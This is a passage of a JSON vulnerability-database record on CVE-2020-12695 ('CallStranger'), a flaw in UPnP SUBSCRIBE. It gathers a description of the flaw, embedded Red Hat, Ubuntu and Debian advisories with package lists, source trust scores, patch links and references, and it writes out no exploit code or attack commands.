"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-006708",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-165399",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration. In general, making UPnP available over the the Internet can pose further security vulnerabilities than the one described in this vulnerability note. 
The Open Connectivity Foundation UPnP specification contains a vulnerability regarding improper default permissions. Information may be obtained and service operation may be interrupted (DoS). A security vulnerability exists in UPnP versions prior to 2020-04-17. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: gssdp and gupnp security update\nAdvisory ID: RHSA-2021:1789-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1789\nIssue date: 2021-05-18\nCVE Names: CVE-2020-12695\n====================================================================\n1. Summary:\n\nAn update for gssdp and gupnp is now available for Red Hat Enterprise Linux\n8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nGUPnP is an object-oriented open source framework for creating UPnP devices\nand control points, written in C using GObject and libsoup. The GUPnP API\nis intended to be easy to use, efficient and flexible. \n\nGSSDP implements resource discovery and announcement over SSDP and is part\nof gUPnP. \n\nThe following packages have been upgraded to a later upstream version:\ngssdp (1.0.5), gupnp (1.0.6). 
(BZ#1846589, BZ#1861928)\n\nSecurity Fix(es):\n\n* hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\ngssdp-1.0.5-1.el8.src.rpm\ngupnp-1.0.6-1.el8.src.rpm\n\naarch64:\ngssdp-1.0.5-1.el8.aarch64.rpm\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-1.0.6-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\n\nppc64le:\ngssdp-1.0.5-1.el8.ppc64le.rpm\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-1.0.6-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-1.0.5-1.el8.s390x.rpm\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-1.0.6-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-1.0.5-1.el8.i686.rpm\ngssdp-1.0.5-1.el8.x86_64.rpm\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debugi
nfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-1.0.6-1.el8.i686.rpm\ngupnp-1.0.6-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-devel-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\ngupnp-devel-1.0.6-1.el8.aarch64.rpm\n\nnoarch:\ngssdp-docs-1.0.5-1.el8.noarch.rpm\n\nppc64le:\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-devel-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\ngupnp-devel-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-devel-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\ngupnp-devel-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-devel-1.0.5-1.el8.i686.rpm\ngssdp-devel-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\ngupnp-devel-1.0.6-1.el8.i686.rpm\ngupnp-devel-1.0.6-1.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. 
Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-12695\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6\nuJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl\nLw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P\n++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7\nizSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k\nMK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH\nfYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh\nYtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu\nm+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN\nHJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET\nV/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a\n7bb2GlcOcWo=2GSN\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2020-12695)\n\nIt was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. =========================================================================\nUbuntu Security Notice USN-4734-2\nFebruary 16, 2021\n\nwpa vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in wpa_supplicant and hostapd. 
\n\nSoftware Description:\n- wpa: client support for WPA and WPA2\n\nDetails:\n\nUSN-4734-1 fixed several vulnerabilities in wpa_supplicant. This\nupdate provides the corresponding update for Ubuntu 14.04 ESM. \n\nIt was discovered that wpa_supplicant did not properly handle P2P\n(Wi-Fi Direct) group information in some situations, leading to a\nheap overflow. A physically proximate attacker could use this to cause a\ndenial of service or possibly execute arbitrary code. (CVE-2021-0326)\n\nIt was discovered that hostapd did not properly handle UPnP subscribe\nmessages in some circumstances. An attacker could use this to cause a\ndenial of service. (CVE-2020-12695)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n hostapd 1:2.1-0ubuntu1.7+esm3\n wpasupplicant 2.1-0ubuntu1.7+esm3\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:2.7+git20190128+0c1e29f-6+deb10u3. \n\nWe recommend that you upgrade your wpa packages. 
\n\nFor the detailed security status of wpa please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/wpa\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU\nIa860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b\nq7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB\n9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529\n5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS\nBaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB\nwOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN\n7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a\naP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV\nBNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi\ne5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0=\n=CU/j\n-----END PGP SIGNATURE-----\n. In addition minidlna was susceptible to the\n\"CallStranger\" UPnP vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12695"
},
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-12695",
"trust": 4.1
},
{
"db": "CERT/CC",
"id": "VU#339275",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "158051",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2020/06/08/2",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "161288",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162672",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159172",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021122905",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052202",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1382",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0575",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1728",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0417",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4372",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2705",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2733",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3160",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161444",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "161397",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-37941",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-165399",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169049",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168951",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"id": "VAR-202006-0391",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
}
],
"trust": 0.6333333333333333
},
"last_update_date": "2024-07-23T21:20:57.987000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-N11",
"trust": 0.8,
"url": "https://www.asus.com/us/networking/rtn11/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.broadcom.com/"
},
{
"title": "Canon SELPHY CP1200",
"trust": 0.8,
"url": "https://en.canon-me.com/support/consumer_products/products/printers/compact_photo/cd__cp_series/selphy_cp1200.html?type=drivers\u0026language=\u0026os=windows%208.1%20(64-bit)"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.cisco.com/c/en/us/index.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://us.dlink.com/en/consumer"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dell.com/en-us"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://community.ui.com/"
},
{
"title": "hostapd",
"trust": 0.8,
"url": "https://jvndb.jvn.jp/ja/contents/2019/jvndb-2019-013311.html"
},
{
"title": "Debian CVElist Bug Report Logs: wpa: CVE-2020-12695",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cdef40da4b3b6b2f4fcf08e447d20494"
},
{
"title": "Debian Security Advisories: DSA-4806-1 minidlna -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5e0b1e00748aee507290bde9650370c7"
},
{
"title": "Arch Linux Advisories: [ASA-202012-16] hostapd: proxy injection",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202012-16"
},
{
"title": "Debian Security Advisories: DSA-4898-1 wpa -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2832d7aeef980951ddf42089219be7b3"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-12695 log"
},
{
"title": "awesome-from-stars",
"trust": 0.1,
"url": "https://github.com/krzemienski/awesome-from-stars "
},
{
"title": "callstranger-detector",
"trust": 0.1,
"url": "https://github.com/corelight/callstranger-detector "
},
{
"title": "CallStranger",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/callstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/xcod3bughunt3r/callstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/dialstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/aoeii/asuswrt-for-tenda-ac9-router "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-276",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.kb.cert.org/vuls/id/339275"
},
{
"trust": 2.5,
"url": "https://github.com/yunuscadirci/callstranger"
},
{
"trust": 2.5,
"url": "https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/158051/callstranger-upnp-vulnerability-checker.html"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2020/dsa-4806"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2021/dsa-4898"
},
{
"trust": 1.7,
"url": "https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/"
},
{
"trust": 1.7,
"url": "https://github.com/corelight/callstranger-detector"
},
{
"trust": 1.7,
"url": "https://www.callstranger.com"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2020/06/08/2"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/4494-1/"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12695"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 0.8,
"url": "https://callstranger.com"
},
{
"trust": 0.8,
"url": "https://openconnectivity.org/developer/specifications/upnp-resources/upnp/"
},
{
"trust": 0.8,
"url": "https://kb.cert.org/vuls/search/?q=upnp"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12695"
},
{
"trust": 0.8,
"url": "https://jvn.jp/ta/jvnta95827565/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052202"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4372/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1728"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162672/red-hat-security-advisory-2021-1789-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0417"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3160/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2733/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1382"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159172/ubuntu-security-notice-usn-4494-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315.2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0575"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2705/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315/"
},
{
"trust": 0.6,
"url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200701-01-upnp-cn"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161288/ubuntu-security-notice-usn-4722-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/upnp-information-disclosure-via-subscribe-delivery-url-32701"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0326"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28926"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4734-1"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12695"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/gupnp/1.2.3-0ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4494-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.1.5+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4722-1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4734-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu8.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.2"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27803"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/wpa"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/minidlna"
}
],
"sources": [
{
"db": "CERT/CC",
